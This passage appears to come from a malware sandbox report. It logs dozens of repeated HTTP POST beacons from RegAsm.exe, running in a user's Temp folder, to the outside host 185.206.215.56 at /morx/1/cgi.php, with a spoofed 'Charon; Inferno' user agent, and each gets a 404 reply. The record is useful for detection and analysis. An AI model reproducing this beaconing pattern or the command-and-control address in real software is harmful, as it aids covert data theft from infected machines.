X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 41 | Source IP: 192.168.2.22 | Source Port: 49208 | Destination IP: 185.206.215.56 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp: Jan 5, 2021 19:06:24.246260881 CET | kBytes transferred: 1196 | Direction: OUT
Data:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close

Timestamp: Jan 5, 2021 19:06:24.440570116 CET | kBytes transferred: 1196 | Direction: IN
Data:
HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:23 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 42 | Source IP: 192.168.2.22 | Source Port: 49209 | Destination IP: 185.206.215.56 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp: Jan 5, 2021 19:06:24.648293972 CET | kBytes transferred: 1197 | Direction: OUT
Data:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close

Timestamp: Jan 5, 2021 19:06:24.816570997 CET | kBytes transferred: 1197 | Direction: IN
Data:
HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:23 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 43 | Source IP: 192.168.2.22 | Source Port: 49210 | Destination IP: 185.206.215.56 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp: Jan 5, 2021 19:06:25.024326086 CET | kBytes transferred: 1198 | Direction: OUT
Data:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close

Timestamp: Jan 5, 2021 19:06:25.203072071 CET | kBytes transferred: 1199 | Direction: IN
Data:
HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:24 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 44 | Source IP: 192.168.2.22 | Source Port: 49211 | Destination IP: 185.206.215.56 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp: Jan 5, 2021 19:06:25.428992033 CET | kBytes transferred: 1199 | Direction: OUT
Data:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close

Timestamp: Jan 5, 2021 19:06:25.591475010 CET | kBytes transferred: 1200 | Direction: IN
Data:
HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:24 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 45 | Source IP: 192.168.2.22 | Source Port: 49212 | Destination IP: 185.206.215.56 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp: Jan 5, 2021 19:06:25.813759089 CET | kBytes transferred: 1201 | Direction: OUT
Data:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close

Timestamp: Jan 5, 2021 19:06:25.992160082 CET | kBytes transferred: 1201 | Direction: IN
Data:
HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:25 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.2.22 | 49213 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:26.197896004 CET | 1202 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:26.381041050 CET | 1203 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:25 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
47 | 192.168.2.22 | 49214 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:26.599441051 CET | 1203 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:26.766199112 CET | 1204 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:25 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.2.22 | 49215 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:26.971787930 CET | 1205 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:27.131364107 CET | 1205 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:26 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
49 | 192.168.2.22 | 49216 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:27.359759092 CET | 1206 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:27.547158957 CET | 1207 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:26 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.22 | 49172 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:09.279376030 CET | 1148 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:09.462393999 CET | 1149 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:08 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
50 | 192.168.2.22 | 49217 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:27.753619909 CET | 1207 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:27.916227102 CET | 1208 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:27 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
51 | 192.168.2.22 | 49218 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:28.127708912 CET | 1209 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:28.287151098 CET | 1209 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:27 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
52 | 192.168.2.22 | 49219 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:28.505440950 CET | 1210 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:28.661950111 CET | 1211 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:27 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
53 | 192.168.2.22 | 49220 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:28.880701065 CET | 1211 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:29.048592091 CET | 1212 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:28 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
54 | 192.168.2.22 | 49221 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:29.244494915 CET | 1213 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:29.409620047 CET | 1213 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:28 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
55 | 192.168.2.22 | 49222 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:29.630363941 CET | 1214 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:29.797473907 CET | 1215 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:28 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
56 | 192.168.2.22 | 49223 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:30.014888048 CET | 1215 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:30.193197012 CET | 1216 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:29 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         57          192.168.2.22  49224        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:30.409914970 CET  1217                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                         Jan 5, 2021 19:06:30.572042942 CET  1217                IN         HTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:29 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         58          192.168.2.22  49225        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:30.786520004 CET  1218                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                         Jan 5, 2021 19:06:30.947633028 CET  1219                IN         HTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:30 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         59          192.168.2.22  49226        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:31.159641027 CET  1219                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                         Jan 5, 2021 19:06:31.319802046 CET  1220                IN         HTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:30 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         6           192.168.2.22  49173        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:09.669670105 CET  1149                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                         Jan 5, 2021 19:06:09.843837023 CET  1150                IN         HTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:08 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         60          192.168.2.22  49227        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:31.542985916 CET  1221                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                         Jan 5, 2021 19:06:31.697483063 CET  1221                IN         HTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:30 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         61          192.168.2.22  49228        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:31.903232098 CET  1222                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                         Jan 5, 2021 19:06:32.053069115 CET  1223                IN         HTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:31 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         62          192.168.2.22  49229        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:32.262785912 CET  1223                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                         Jan 5, 2021 19:06:32.426687956 CET  1224                IN         HTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:31 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         63          192.168.2.22  49230        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:32.647726059 CET  1225                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                         Jan 5, 2021 19:06:32.815516949 CET  1225                IN         HTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:31 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         64          192.168.2.22  49231        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                         Timestamp                           kBytes transferred  Direction  Data
                                                                                         Jan 5, 2021 19:06:33.031393051 CET  1226                OUT        POST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                         Jan 5, 2021 19:06:33.190809965 CET  1226                IN         HTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:32 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                         65          192.168.2.22  49232        185.206.215.56  80                C:\Users\user\AppData\Local\Temp\RegAsm.exe
